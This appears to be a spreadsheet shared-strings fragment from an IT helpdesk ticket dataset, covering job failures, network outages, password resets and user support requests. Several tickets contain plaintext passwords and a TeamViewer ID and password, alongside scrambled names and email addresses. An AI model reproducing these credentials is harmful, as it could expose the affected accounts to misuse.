job bwhrattr failed in job_scheduler at: 10/15/2016 08:45:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1320 failed in job_scheduler at: 10/15/2016 08:31:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1320 failed in job_scheduler at: 10/15/2016 08:31:00</t>
  </si>
  <si>
    <t>pc an r241 in halle c nÃ¤he bÃ¼ro nesner fÃ¤hrt nicht hoch</t>
  </si>
  <si>
    <t>einlasten bei it-germany, da hierfÃ¼r bereits ein ersatz-pc verbaut ist und ein neuer bestellt wurde.</t>
  </si>
  <si>
    <t>dtrvxiuq bwuqdtfo</t>
  </si>
  <si>
    <t xml:space="preserve"> laptop model latitude 7350 speakers are not working</t>
  </si>
  <si>
    <t>name:ilypdtno mkdfetuq
language:
browser:microsoft internet explorer
email:ilypdtno.mkdfetuq@gmail.com
customer number:
telephone:
summary:my laptop model latitude 7350 speakers are not working</t>
  </si>
  <si>
    <t>ilypdtno mkdfetuq</t>
  </si>
  <si>
    <t>jobs are getting fail due to dbif_rsql_sql_error issue</t>
  </si>
  <si>
    <t>network outage: vogelfontein, south africa ,sa network is down since 2:28am et on 10/15/16</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________2:28am et on 10/15/16______________x000D_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_____na______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___no____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</si>
  <si>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bwsdslspln failed in job_scheduler at: 10/15/2016 02:27:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwsdslspln failed in job_scheduler at: 10/15/2016 02:27:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1338 failed in job_scheduler at: 10/15/2016 02:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1338 failed in job_scheduler at: 10/15/2016 02:06:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1373 failed in job_scheduler at: 10/15/2016 02:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1373 failed in job_scheduler at: 10/15/2016 02:03:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1382 failed in job_scheduler at: 10/15/2016 01:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1382 failed in job_scheduler at: 10/15/2016 01:39:00</t>
  </si>
  <si>
    <t xml:space="preserve"> server lnbdm839 (active directory) located in   philadelphâ€‹ia is down since 1:14am et on 10/15/16</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 10/15/2016 01:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 10/15/2016 01:32:00</t>
  </si>
  <si>
    <t>iczltbdf cmvjhyxl</t>
  </si>
  <si>
    <t>m drive access request</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ajlbguzn.fxrwivyg@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please provide access m:\pu5&lt;file:///\\HostName_95\departments\pu5&gt; press tool folder for following computers._x000D_
awywx217842_x000D_
awyl8911908_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>ajlbguzn fxrwivyg</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_56filesys failed in job_scheduler at: 10/15/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_56filesys failed in job_scheduler at: 10/15/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1653 failed in job_scheduler at: 10/15/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1653 failed in job_scheduler at: 10/15/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">pass word reset </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ujzhflpn.oibnxrvq@gmail.com
hi
               please reset the pass word as "daypay3" for below user id
user id â€“ purartnpn12
best </t>
  </si>
  <si>
    <t>ujzhflpn oibnxrvq</t>
  </si>
  <si>
    <t>network outage: engineering_toolkuznetsk warehouse - (company) network is down since 9:47pm et on 10/14/16</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________9:47pm et on 10/14/16______________x000D_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___na_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________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</si>
  <si>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SID_56filesys failed in job_scheduler at: 10/14/2016 22:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_56filesys failed in job_scheduler at: 10/14/2016 22:25:00</t>
  </si>
  <si>
    <t>vogelfontein, south africa , sa:company-eu-zaf-vogelfontein-2960-access-sw08.company.com is down since 8:04 pm et on 10/14.</t>
  </si>
  <si>
    <t xml:space="preserve">vogelfontein, south africa , sa:company-eu-zaf-vogelfontein-2960-access-sw08.company.com is down since 8:04 pm et on 10/14._x000D_
interface down - on   gigabitethernet1/0/49 Â· uplink to company-eu-zaf-vogelfontein-2960-access-sw08 - on   company-eu-zaf-vogelfontein-2960-core-sw01.company.com </t>
  </si>
  <si>
    <t>svnptdwu zopxaqib</t>
  </si>
  <si>
    <t>unable to sync mails or calendars on mobile device</t>
  </si>
  <si>
    <t>jyzkbgpm vxmjcbdw</t>
  </si>
  <si>
    <t>ticket update on inplant_869636</t>
  </si>
  <si>
    <t>unable to connect to network printer</t>
  </si>
  <si>
    <t>unable to connect to network printer_x000D_
_x000D_
ticket update on inplant_869629</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_562 failed in job_scheduler at: 10/14/2016 17:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_562 failed in job_scheduler at: 10/14/2016 17:51:00</t>
  </si>
  <si>
    <t xml:space="preserve">password not update </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cuzhydjl.fugwxdqh@gmail.com_x000D_
_x000D_
hello team good afternoon._x000D_
_x000D_
my name is cuzhydjl fugwxdqh, mexico queretaro._x000D_
_x000D_
unfortunate my password was expired but i forgot update it, now i cannot enter  at the company systems (distributor_tool, crm,)_x000D_
_x000D_
today i tried to change the password but the web site don't give me access, please can you said me what i should do about this?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cuzhydjl fugwxdqh</t>
  </si>
  <si>
    <t>network printer not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: umzcxfah.aoshpjiu@gmail.com_x000D_
_x000D_
please check to see if printer rr14 on lrrsm007 is connected to the network.  i have sent several documents but they are all sitting in queue.  the printer is turned on and says it is ready but nothing happens._x000D_
</t>
  </si>
  <si>
    <t>umzcxfah aoshpjiu</t>
  </si>
  <si>
    <t>ticket update on inplant_869625</t>
  </si>
  <si>
    <t>folder deleted in HostName_768</t>
  </si>
  <si>
    <t xml:space="preserve">folder deleted in HostName_768
folder needs to be restored
t:\globaleng\beyond machining\gtc\
</t>
  </si>
  <si>
    <t xml:space="preserve">unable to log in to erp netweaver </t>
  </si>
  <si>
    <t>lzqbyner jyncfahz</t>
  </si>
  <si>
    <t>mxifcasu cxsembup</t>
  </si>
  <si>
    <t>qdezvfts raikxeon</t>
  </si>
  <si>
    <t>request: unlock user account  (sekarf4ts)</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sthyuraj.sektyhar@company.com
hello,
please unlock my user account
user name: sekarf4ts
</t>
  </si>
  <si>
    <t>sxhqfaoe evobwgiy</t>
  </si>
  <si>
    <t>dmtcvxow xkjriven</t>
  </si>
  <si>
    <t>company center accounts added- help with a deleted item</t>
  </si>
  <si>
    <t>please add to my company center accounts 81543268,70453441,81819969,70776642,81887755,70823214 and 81936238.  on account 81945823 i accidently deleted the orders section please restore</t>
  </si>
  <si>
    <t>dypabsjm nuzvhjik</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_6_regen failed in job_scheduler at: 10/14/2016 14:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_6_regen failed in job_scheduler at: 10/14/2016 14:55:00</t>
  </si>
  <si>
    <t>cannot create a delivery. please fix this in apo</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: hybiaxlk.lawptzir@gmail.com
[cid:image001.jpg@01d22610.66263d40]
kryuisti turleythy
usa site business manager
hybiaxlk.lawptzir@gmail.com&lt;mailto:hybiaxlk.lawptzir@gmail.com&gt;
</t>
  </si>
  <si>
    <t>hybiaxlk lawptzir</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_5_regen failed in job_scheduler at: 10/14/2016 14:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_5_regen failed in job_scheduler at: 10/14/2016 14:25:00</t>
  </si>
  <si>
    <t xml:space="preserve">create telephony_software id for the gso new hire sewilrxm cbikymvf </t>
  </si>
  <si>
    <t>sewilrxm cbikymvf</t>
  </si>
  <si>
    <t>unable to save exe file</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rlphwiqn.zagvbkro@gmail.com_x000D_
_x000D_
hello_x000D_
i need help saving an .exe file. i had an analyst attempting to help today and he asked me to put in a help desk ticket as there is a problem with my pc. the file he is attempting to save is attached._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>edqylkio ykomciav</t>
  </si>
  <si>
    <t>vip 2: user unable to join skype meeting from external vendor</t>
  </si>
  <si>
    <t>mfdaluin gxtkyzeb</t>
  </si>
  <si>
    <t xml:space="preserve">analysis for office (aao) tool  </t>
  </si>
  <si>
    <t>install the analysis for office (aao) tool   on the laptop.</t>
  </si>
  <si>
    <t>hkfipags sdilxrfk</t>
  </si>
  <si>
    <t>error: no sto possible with these combinations</t>
  </si>
  <si>
    <t xml:space="preserve">error: no sto possible with these combinations_x000D_
_x000D_
error when entering a stock transfer for material # 2122807 from plant_93 to plant_333._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>koqntham sqiuctfl</t>
  </si>
  <si>
    <t>system hangs and slow</t>
  </si>
  <si>
    <t>help to format and reinstall the os on the laptop . system is getting hang suddenly and slow running.</t>
  </si>
  <si>
    <t>aqourvgz mkehgcdu</t>
  </si>
  <si>
    <t>java error</t>
  </si>
  <si>
    <t>help to update the java ver.on the internet explore</t>
  </si>
  <si>
    <t>ejmdqfbl xuqkwdfa</t>
  </si>
  <si>
    <t>access issue</t>
  </si>
  <si>
    <t>unable to install the software asking for administrator access</t>
  </si>
  <si>
    <t>ydgasebx ceuyrjhs</t>
  </si>
  <si>
    <t>access denied on the collaboration_platform finance link</t>
  </si>
  <si>
    <t xml:space="preserve">link where user needs access _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wqxzleky uwjchqor</t>
  </si>
  <si>
    <t>melisdfysa is not receiving emails from  k-rgrtrs</t>
  </si>
  <si>
    <t xml:space="preserve">melisdfysa is not included on the k-rgrtrs email list.  she is not receiving emails coming from this address.
</t>
  </si>
  <si>
    <t>owfecbnx gfloariu</t>
  </si>
  <si>
    <t>phone issue</t>
  </si>
  <si>
    <t>generirtc information</t>
  </si>
  <si>
    <t>nrmjhuox ktuyqewp</t>
  </si>
  <si>
    <t>when i click on the download to pdf i don't get the pop-up which allows me to download to pdf (see attachment)</t>
  </si>
  <si>
    <t>when i click on the download to pdf i don't get the pop-up which allows me to download to pdf (see attachment)_x000D_
hi this is bthrob ducyua,_x000D_
i had don put *.crm.dynamics.com in his popup blocker and it worked, i don't know if that's the only thing he needs in the pop-up blocker i also had him put company.collaboration_platform.com in his pop-up blocker because that's what i had in mine.  please close this ticket if this is all that needs to be done.</t>
  </si>
  <si>
    <t>ijplstng juybetlo</t>
  </si>
  <si>
    <t>outlook issue</t>
  </si>
  <si>
    <t>outlook issue // unable to open new email and is going to not responding.</t>
  </si>
  <si>
    <t>vfsjoquc razepdqb</t>
  </si>
  <si>
    <t>inc1559041 - ticket update</t>
  </si>
  <si>
    <t xml:space="preserve">lost connection to \\hqn029 which is a personal drive shared between my desktop and laptop. </t>
  </si>
  <si>
    <t xml:space="preserve">i lost connection to \\hqn029 which is a personal drive shared between my desktop and laptop. i am able to access it on my desktop but no longer on my laptop. i tried to map to the location again, but was unsuccessful. </t>
  </si>
  <si>
    <t>zhwktnia dfhormwk</t>
  </si>
  <si>
    <t>i cant see my archived emails in outlook.  i am leaving today, and natytse sylyhtsvesuyter will need to see those archived emails</t>
  </si>
  <si>
    <t>koiapqbg teyldpkw</t>
  </si>
  <si>
    <t>erp printer rerouting</t>
  </si>
  <si>
    <t>name:uicjxvng jcoshmbf
language:
browser:microsoft internet explorer
email:uicjxvng.jcoshmbf@gmail.com
customer number:
telephone:
summary:i need to change my default printer in erp for transactions co01 and co02. despite changing my default in su3, they are still printing to the wrong printer.</t>
  </si>
  <si>
    <t>uicjxvng jcoshmbf</t>
  </si>
  <si>
    <t xml:space="preserve">interface: fastethernet0/48 cisco aircap 3702 on company-na-usa-usa-idf-2-b-2960-access-sw02.company.com is down </t>
  </si>
  <si>
    <t xml:space="preserve"> interface: fastethernet0/48 cisco aircap 3702 on company-na-usa-usa-idf-2-b-2960-access-sw02.company.com is down since 10:12 am et on 10/14.</t>
  </si>
  <si>
    <t>unable to open SID_1 and password issue in SID_21</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: yhtdon.zdyhazula@company.com
i am having difficulty obtaining data from bobj which i must have this morning. are there any issues being reported? if not, could someone please call me.
</t>
  </si>
  <si>
    <t>erp password locked out after updating passwords with password_management_tool password manager</t>
  </si>
  <si>
    <t>everything else works.  just erp SID_34 is locked out.</t>
  </si>
  <si>
    <t>fjhqiwau gvkiuanl</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to hub to check pay statements </t>
  </si>
  <si>
    <t>wrdmxloh dshplynj</t>
  </si>
  <si>
    <t>HostName_106:windows disk space utilization alert :utiliuytretion is 85%,free space available is 15% under 3gb.</t>
  </si>
  <si>
    <t>problem with erp sales info</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwafuh.tcjnuswg@gmail.com
hi,
i am having trouble getting erp sales info. there are no figures in the fields when i pull up a report.
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
from: suthye kinght
sent: wednesday, october 12, 2016 1:23 pm
to: vkzwafuh tcjnuswg &lt;vkzwafuh.tcjnuswg@gmail.com&gt;
cc: sntvfpbl vtokgley &lt;sntvfpbl.vtokgley@gmail.com&gt;
subject: re: erp sales info
hi stuarthsyt,
you may have to put an it ticket in to get this fixed.
</t>
  </si>
  <si>
    <t>vkzwafuh tcjnuswg</t>
  </si>
  <si>
    <t>unable to create skype meetings onbehalf of tomashtgd mchectg</t>
  </si>
  <si>
    <t>unable to create skype meetings on behalf of tomashtgd mchectg</t>
  </si>
  <si>
    <t>ztnpeshl vmdyglqn</t>
  </si>
  <si>
    <t>interface1/0/40 is down on switch company-eu-deu-germany-emsw03-2960s-access-sw03 since 9:44 am et on 10/14.</t>
  </si>
  <si>
    <t>issues viewing drawings.</t>
  </si>
  <si>
    <t>issues viewing drawings.  please see the attached document with the error messages.</t>
  </si>
  <si>
    <t xml:space="preserve">a kÃ¼ndigung for dxnzkcuh eqdgoxap, 11161751, effective 13.10.2016 has been approved. </t>
  </si>
  <si>
    <t xml:space="preserve">hello , _x000D_
_x000D_
a kÃ¼ndigung for dxnzkcuh eqdgoxap, 11161751, effective 13.10.2016 has been approved. _x000D_
_x000D_
click the link to view. _x000D_
</t>
  </si>
  <si>
    <t>unable to see all the tabs under ess</t>
  </si>
  <si>
    <t>uiotbkhs grymzxiq</t>
  </si>
  <si>
    <t>let's talk video is not playing.</t>
  </si>
  <si>
    <t>ghuwlrqk tzgbolhk</t>
  </si>
  <si>
    <t>i cannot access ethics portal</t>
  </si>
  <si>
    <t xml:space="preserve">i have recently switched account from company.com to company.com, now, whilst i'm able to log into the hub with the new credentials, when i try to log into the ethics portal i get this message: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
giuliasana byhdderni - bernig
</t>
  </si>
  <si>
    <t>issue with microsoft office - key entry.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hcyemunl.lnecsgpd@gmail.com_x000D_
_x000D_
hi  it team,_x000D_
_x000D_
here with enclosed the screen shot. it says this copy of microsoft office professional is not activated. please suggest what to be done for key entry for activation. this popup comes automatically after i login to ms outlook._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>hcyemunl lnecsgpd</t>
  </si>
  <si>
    <t>ticket update for-ticket_no0448195</t>
  </si>
  <si>
    <t xml:space="preserve">user called to inform that she was kicked out of eu remote after 50 minutes and now she is connected to na its working fine </t>
  </si>
  <si>
    <t>engineering tool will not open</t>
  </si>
  <si>
    <t>mathrv macyhtkey, - my engineering tool client will not open. i am getting an error message, "cannot continue. the application is improperly formatheywted. contact the application vendor for assistance". i have uninstalled and re-installed several times.</t>
  </si>
  <si>
    <t xml:space="preserve">need access to vpn </t>
  </si>
  <si>
    <t>need access to vpn computer name-lcvl7406035</t>
  </si>
  <si>
    <t>txjwyami fhlgpsim</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1653 failed in job_scheduler at: 10/14/2016 08:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1653 failed in job_scheduler at: 10/14/2016 08:43:00</t>
  </si>
  <si>
    <t>error message trying to log into purchasing to order</t>
  </si>
  <si>
    <t xml:space="preserve">error message trying to log into purchasing to order - user id - cuthyunniy 
i have attached the email that shows the errors i am receiving
</t>
  </si>
  <si>
    <t>mohryldw meutqjzy</t>
  </si>
  <si>
    <t>htwsufnv zaguhmki</t>
  </si>
  <si>
    <t>blocked out from expense report</t>
  </si>
  <si>
    <t>ikgrtwhz tmqdiwge</t>
  </si>
  <si>
    <t>some confidential document was shared on the hub and everyone had access to it.</t>
  </si>
  <si>
    <t xml:space="preserve">some confidential document was shared on the hub and everyone had access to it.
link : &lt;
mikhghytr
this is an issue.
sent from my iphone
begin forwarded message:
from: efdhrlwv aoxtugzr &lt;efdhrlwv.aoxtugzr@gmail.com&gt;
date: october 14, 2016 at 5:00:02 am edt
to: aedwrpvo qbpafrsx &lt;aedwrpvo.qbpafrsx@gmail.com&gt;, aqritplu beuflorc &lt;aqritplu.beuflorc@gmail.com&gt;, &lt;bnsaqekm.xoglfeij@gmail.com&gt;,  itclukpe aimcfeko &lt;itclukpe.aimcfeko@gmail.com&gt;, yjscozva lyjoeacv &lt;yjscozva.lyjoeacv@gmail.com&gt;
subject: confidential information on the hub
this was brought to my attention this morning by kpudhygb vnizrdeb. if you search "usa jobs" on the hub, this information is in the results field. just thought you all might want to know.
open: 
&lt;
</t>
  </si>
  <si>
    <t>request you to reset my erp password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dshferby.houtnzdi@gmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>dshferby houtnzdi</t>
  </si>
  <si>
    <t xml:space="preserve">usa backup exec server rgtsm005 has a filed raid hdd physical disk 0:0:2 </t>
  </si>
  <si>
    <t>unable to open outlook and mobile device activation</t>
  </si>
  <si>
    <t>please reset password  in SID_34   for user id : maihtyrhu</t>
  </si>
  <si>
    <t>user id &amp; password fail</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: yxliakph.soucfnqe@gmail.com
dear sir,
one apprentice,mr.suniythulkuujmar,nk,is unable to view his salary statements due to user id &amp; password fail.
pl. help to recover the same.
old  id:vvkhyhums16
old password:dhad7wuz
with </t>
  </si>
  <si>
    <t>yxliakph soucfnqe</t>
  </si>
  <si>
    <t>telefon defekt</t>
  </si>
  <si>
    <t>sxabotdw xlozwcyk</t>
  </si>
  <si>
    <t>invoicing error</t>
  </si>
  <si>
    <t>yhmwxsqj ugnthxky</t>
  </si>
  <si>
    <t>account locked in ad</t>
  </si>
  <si>
    <t>gwmspqeo vwfetaqg</t>
  </si>
  <si>
    <t>skype account login problem</t>
  </si>
  <si>
    <t xml:space="preserve">name:ilypdtno mkdfetuq
language:
browser:microsoft internet explorer
email:ilypdtno.mkdfetuq@gmail.com
customer number:
telephone:
summary:skype account login problem
________________
ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
dwfiykeo argtxmvcumar3
 hello
ilypdtno mkdfetuq
 hi ..am facing problem in signing in skype account
dwfiykeo argtxmvcumar3
 please provide me id &amp; password for team viewer
ilypdtno mkdfetuq
 id :747 077 476
 password :2364
dwfiykeo argtxmvcumar3
 working now
ilypdtno mkdfetuq
 yup </t>
  </si>
  <si>
    <t>the plm services is reporting a : down status on, HostName_1032</t>
  </si>
  <si>
    <t>monitor tauschen \dhoalycb yopvwrjq</t>
  </si>
  <si>
    <t>dhoalycb yopvwrjq</t>
  </si>
  <si>
    <t>password is not getting synchronized.</t>
  </si>
  <si>
    <t>bgohnwer ybinfojr</t>
  </si>
  <si>
    <t>unable login ethics</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: igdnsjhz.awnftgev@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i'm company apac company location it. many of our users didn't receive the email for ethics training of fy17 q2. but all of them have completed ethics training of fy17 q1. i found when they log into ethics, it will be displayed below hint_x000D_
_x000D_
_x000D_
        [cid:image002.jpg@01d22638.3c313e90]_x000D_
_x000D_
_x000D_
please help us change the user's ethics status back to correct setting. </t>
  </si>
  <si>
    <t>igdnsjhz awnftgev</t>
  </si>
  <si>
    <t>circuit outage:company-na-usa-usa-mpls-2811-rtr01 is down at 4:10 am et on 10/14.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ____x_circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____yes____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______4:10 am et on 10/14.________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? _____no__    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ____na___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ____yes__    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___yes_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _______na____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___na____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _____global_telecom_1__000000223023260__________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>install office2010 \ ewel8323894 \qidgvtwa qvbutayx</t>
  </si>
  <si>
    <t>quote save / material creation process for configured items with quoting engine broken</t>
  </si>
  <si>
    <t>quote save in erp SID_34 broken for configured items with erp vc (quoting engine). it only generates an error message "line item -&gt; 10 specify positive values only. _x000D_
it seems to be a change in erp SID_34 yesterday, oct. 13, between 8pm and 11 pm est (server time). we noticed there is a break in the material number sequence. all mm's younger than 11pm does not exists in SID_34 neither in SID_1 or SID_21.</t>
  </si>
  <si>
    <t>setup new ws \batuhan gueduel</t>
  </si>
  <si>
    <t>kglnimxw nhdqaupz</t>
  </si>
  <si>
    <t>setup new ws \szockfpj izohlgcq</t>
  </si>
  <si>
    <t>szockfpj izohlgcq</t>
  </si>
  <si>
    <t>setup new ws \qdztknml hpcxnyrq</t>
  </si>
  <si>
    <t>qdztknml hpcxnyrq</t>
  </si>
  <si>
    <t>reporting_tool dashbankrd not appearing in my crm page</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: xfdkwusj.gyklresa@gmail.com
hello
though connected â€“ the reporting_engineering_tool is not shown
[cid:image001.jpg@01d22601.f9d82300]
xfdkwusj gyklresa
sales manager earthworks european served area - south
xfdkwusj.gyklresa@gmail.com&lt;mailto:xfdkwusj.gyklresa@gmail.com&gt;
please note our new telephone number and company address effective 22.08.2016.
*********************************************
company infrastructure gmbh
geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx und naruedlk mpvhakdq
</t>
  </si>
  <si>
    <t>cannot add the lean event</t>
  </si>
  <si>
    <t>i cannot launch 'add the lean event icon' in collaboration_platform. request you to install microsoft 2013 version of it._x000D_
attached is the error for your reference</t>
  </si>
  <si>
    <t>svdefgwl sgtmurfh</t>
  </si>
  <si>
    <t>account zugriff  dyqekzuc djhznybt wiederherstellen - dringend</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: urpbyoke.vwcbhmds@gmail.com_x000D_
_x000D_
dyqekzuc djhznybt sitzt neben mir. er kann seinen account nicht mehr Ã¶ffnen._x000D_
_x000D_
viele grÃ¼ÃŸe, best </t>
  </si>
  <si>
    <t>urpbyoke vwcbhmds</t>
  </si>
  <si>
    <t>problem with laptop- latitude 7350</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ybxsujwi.yzwanorl@gmail.com
dear sir ,
i have got multiple problems with the laptop
1.instant shaking of the screen
2.mails before 1 month cannot be seen unless refreshed .
3. slow in processing
please do the needful and get me out of this proms
</t>
  </si>
  <si>
    <t>ybxsujwi yzwanorl</t>
  </si>
  <si>
    <t>reset the password for imjwbogq xfizlnap on erp / production / erp</t>
  </si>
  <si>
    <t>please reset password to 'daypay3'</t>
  </si>
  <si>
    <t>imjwbogq xfizlnap</t>
  </si>
  <si>
    <t>a next issue to bobj account dbednyuarski</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pgacouel.mpgfkxwr@gmail.com_x000D_
_x000D_
hell o,_x000D_
a next issue to bob j doesn't work on my account_x000D_
[cid:image001.png@01d225fa.3fb2a650]_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>pgacouel mpgfkxwr</t>
  </si>
  <si>
    <t>dyqekzuc djhznybt</t>
  </si>
  <si>
    <t>outlook freezes after crm update.</t>
  </si>
  <si>
    <t>probleme mit der anzeige von offenen emails</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ecoljnvt.lbdqmvfs@gmail.com
hallo ,
seit einiger zeit werden in meinem outlook nicht mehr alle offenen email angezeigt.
[cid:image003.jpg@01d225f8.ca2168f0]
ich muss immer erst auf das blau unterlegte hinweisfeld drÃ¼cken um weitere emails sehen zu kÃ¶nnen.
das geht aber nur wenn ich eine verbindung zum exchange server habe.
da das nicht immer gegeben ist, bitte entsprechend einstellen, dass ich alle emails immer lesen kann.
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>ecoljnvt lbdqmvfs</t>
  </si>
  <si>
    <t>è€ƒå‹¤ç³»ç»Ÿè¿›ä¸åŽ»è¯·å¤„ç†è°¢è°¢ï¼</t>
  </si>
  <si>
    <t>spgdcvhb ocagnpmj</t>
  </si>
  <si>
    <t>telephony_software - issue very bad quality - 1064832909</t>
  </si>
  <si>
    <t>the sound is horrible - customer was very hard to understand. i asked him whether he has this issue, too. not on his side of the line - he said.</t>
  </si>
  <si>
    <t>gmwdvrou aupnvems</t>
  </si>
  <si>
    <t xml:space="preserve">engineering tool and erp not working </t>
  </si>
  <si>
    <t>hukefojy sdquiely</t>
  </si>
  <si>
    <t>need help in resetting password in password_management_tool</t>
  </si>
  <si>
    <t>need extra awb copy for all vendor</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxoynvgi.ntgdsehl@gmail.com
hi it team
kindly please assist as we need extra (mother) awb copy when closing all shipment for all vendor carriers for audit purpose. </t>
  </si>
  <si>
    <t xml:space="preserve">www.company.com &amp; www.company.com  are showing down in monitoring_tool </t>
  </si>
  <si>
    <t xml:space="preserve">observing below alerts in monitoring_tool since 12:14 am on 10/14 et:_x000D_
_x000D_
the www.company.com is reporting a : down status on, ec2-52-5-56-105.compute-1.amazonaws.com. please investigate _x000D_
the www.company.com is reporting a : down status on, ec2-52-5-56-105.compute-1.amazonaws.com. please investigate </t>
  </si>
  <si>
    <t>GRP_51</t>
  </si>
  <si>
    <t>blksigdy nzapgrlx</t>
  </si>
  <si>
    <t>standby laptop for mcae course 5 day 17th to 21st oct</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rnueobcz.lwhcbati@gmail.com
dear saravthsyana,
we need a standby laptop at  hall-1 for our 5 day mcae course.
should have microsoft office, adobe reader &amp; vlc to run the show.
please make it ready today i will collect it at 17th morning 8 am from your dept.
thanking you
</t>
  </si>
  <si>
    <t>rnueobcz lwhcbati</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3052 failed in job_scheduler at: 10/13/2016 23:22:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3052 failed in job_scheduler at: 10/13/2016 23:22:00</t>
  </si>
  <si>
    <t>erp working slow</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rayhtukumujar.br2@company.com
hello,
erp working is very slow since yesterday morning.  but no action has been taken yet.  please raise a sev2 ticket and arrange to resolve the issue immediately.
